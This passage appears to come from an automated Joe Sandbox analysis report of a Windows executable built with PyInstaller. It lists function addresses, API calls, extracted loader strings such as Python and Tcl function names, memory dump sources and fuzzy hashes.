                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                        • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                        • Instruction ID: 6e745d01255eaa1be1c2e395e87ab0e56b5faff784a350867a62fa151ab42fcd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ABF05E41F1A24745FF14BEA15C11375D1805F49B71F881AB09C3E872C1EE9CB541C2B0

                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                        Function 00007FF7F24FC44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                                                                        • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                                        • Instruction ID: 59a5d799ae06ae1d79139fe55dd339f565cab3b626c62ed7711647e2704d91eb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29314D72709A8186EB64DF60E8503FEB360FB84754F44443ADA6D47B94DFB8D548C760
                                                                                                                                                                                                                        Function 00007FF7F24F29E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message$ErrorFormatLast
                                                                                                                                                                                                                        • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                                                                        • API String ID: 3971115935-1149178304
                                                                                                                                                                                                                        • Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                                                                        • Instruction ID: 7071319f3abb2c7111bedfda0b267c0be0b0a3e3be8012db56fb9893e81bb4ac
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47214472618B9582E720EB10F4506EAB364FB88794F801136EBDD53AD8DFBCD546CB90
                                                                                                                                                                                                                        Function 00007FF7F2514F10 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7F2514F55
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F25148A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F25148BC
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2509C58: RtlFreeHeap.NTDLL(?,?,?,00007FF7F2512032,?,?,?,00007FF7F251206F,?,?,00000000,00007FF7F2512535,?,?,?,00007FF7F2512467), ref: 00007FF7F2509C6E
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2509C58: GetLastError.KERNEL32(?,?,?,00007FF7F2512032,?,?,?,00007FF7F251206F,?,?,00000000,00007FF7F2512535,?,?,?,00007FF7F2512467), ref: 00007FF7F2509C78
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2509C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7F2509BEF,?,?,?,?,?,00007FF7F2509ADA), ref: 00007FF7F2509C19
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2509C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7F2509BEF,?,?,?,?,?,00007FF7F2509ADA), ref: 00007FF7F2509C3E
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7F2514F44
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2514908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F251491C
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7F25151BA
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7F25151CB
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7F25151DC
                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7F251541C), ref: 00007FF7F2515203
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4070488512-0
                                                                                                                                                                                                                        • Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                                                                        • Instruction ID: 3aeaa48b98e9a2c873c26974e658c10dac43a099650be9958546b26e2cdc9940
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48D1AC26B1824286E724FF21D8412B9A3A1FF84BA4FC45175EA6D476D5DFBCE841C3E0
                                                                                                                                                                                                                        Function 00007FF7F2509924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                        • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                                        • Instruction ID: 528803218fcb19e591bae4e0415ca435193335fb45a3e9866dcc71a59756d36e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80319332708B8185DB24DF25E8502AEB3A0FB88768F900135EAAD43B99DF7CC545CB50
                                                                                                                                                                                                                        Function 00007FF7F2510B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2227656907-0
                                                                                                                                                                                                                        • Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                                                                                                        • Instruction ID: 4813f5e59ea0b7b396eeedfce053fe82119ad78a9841b4487507826d608a0186
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ABB1B462B1869281EB60FF2298105B9E391EB44BF4F845171EE6D07BC9DFBCE449C790
                                                                                                                                                                                                                        Function 00007FF7F251518C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7F25151BA
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2514908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F251491C
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7F25151CB
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F25148A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F25148BC
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7F25151DC
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F25148D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F25148EC
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2509C58: RtlFreeHeap.NTDLL(?,?,?,00007FF7F2512032,?,?,?,00007FF7F251206F,?,?,00000000,00007FF7F2512535,?,?,?,00007FF7F2512467), ref: 00007FF7F2509C6E
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2509C58: GetLastError.KERNEL32(?,?,?,00007FF7F2512032,?,?,?,00007FF7F251206F,?,?,00000000,00007FF7F2512535,?,?,?,00007FF7F2512467), ref: 00007FF7F2509C78
                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7F251541C), ref: 00007FF7F2515203
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3458911817-0
                                                                                                                                                                                                                        • Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                                                                                                        • Instruction ID: 96b935644db19b6607c3e7d850424867186d8d1230eac5860491b7d4160effcc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45519032B1864286E714FF21E8815A9A361FF48794FC06175EA2D436D5DFBCE441C7E0
                                                                                                                                                                                                                        Function 00007FF7F24F50B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF7F24F5C57,?,00007FF7F24F308E), ref: 00007FF7F24F50C0
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF7F24F5C57,?,00007FF7F24F308E), ref: 00007FF7F24F5101
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF7F24F5C57,?,00007FF7F24F308E), ref: 00007FF7F24F5126
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF7F24F5C57,?,00007FF7F24F308E), ref: 00007FF7F24F514B
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF7F24F5C57,?,00007FF7F24F308E), ref: 00007FF7F24F5173
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF7F24F5C57,?,00007FF7F24F308E), ref: 00007FF7F24F519B
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF7F24F5C57,?,00007FF7F24F308E), ref: 00007FF7F24F51C3
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF7F24F5C57,?,00007FF7F24F308E), ref: 00007FF7F24F51EB
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF7F24F5C57,?,00007FF7F24F308E), ref: 00007FF7F24F5213
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressProc
                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                        • API String ID: 190572456-2007157414
                                                                                                                                                                                                                        • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                                        • Instruction ID: 0eb45044a2fa33c178268928b13b559f27ab4070ce5afcf48fa81ed2b559c5cd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46126CA4A0EB0395FB55BF04A850174A3A1AF45761BE424B5C43E173E0EFFDB948D2E1
                                                                                                                                                                                                                        Function 00007FF7F24F6EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressProc
                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                        • API String ID: 190572456-3427451314
                                                                                                                                                                                                                        • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                        • Instruction ID: 2b32d1391c627165d698c93d92138e8bbb71464e3253f1fbaed014dad6877f6f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1E17968A5EB1390FB59BF54A8501B4A3A5AF48760FD410B5C83D072E4EFFCE948D2E1
                                                                                                                                                                                                                        Function 00007FF7F24F77D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F24F3FA4,00000000,00007FF7F24F1925), ref: 00007FF7F24F86E9
                                                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7F24F7C97,?,?,FFFFFFFF,00007FF7F24F3834), ref: 00007FF7F24F782C
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F26C0: MessageBoxW.USER32 ref: 00007FF7F24F2736
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                        • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                        • API String ID: 1662231829-930877121
                                                                                                                                                                                                                        • Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                                                                                                                                        • Instruction ID: f9c0329967d3076384e5435ecf9ce43ada20d98c4f216951dbfa07606249eb85
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A417F21B2964281FB50FB25E8516BAE261AFC8780FC45031DA7E436D5EEECE904C7E1
                                                                                                                                                                                                                        Function 00007FF7F24F20F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                        • String ID: P%
                                                                                                                                                                                                                        • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                        • Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                                                        • Instruction ID: c207c2fe96b3d4da4c12734f19800d9cd86dc69200e1adf5dc7290cce757e58e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8651F726604BA186D7349F22A4181BAF7A1F798B61F404135EFEE43794DFBCD045CB20
                                                                                                                                                                                                                        Function 00007FF7F25055A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 493COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
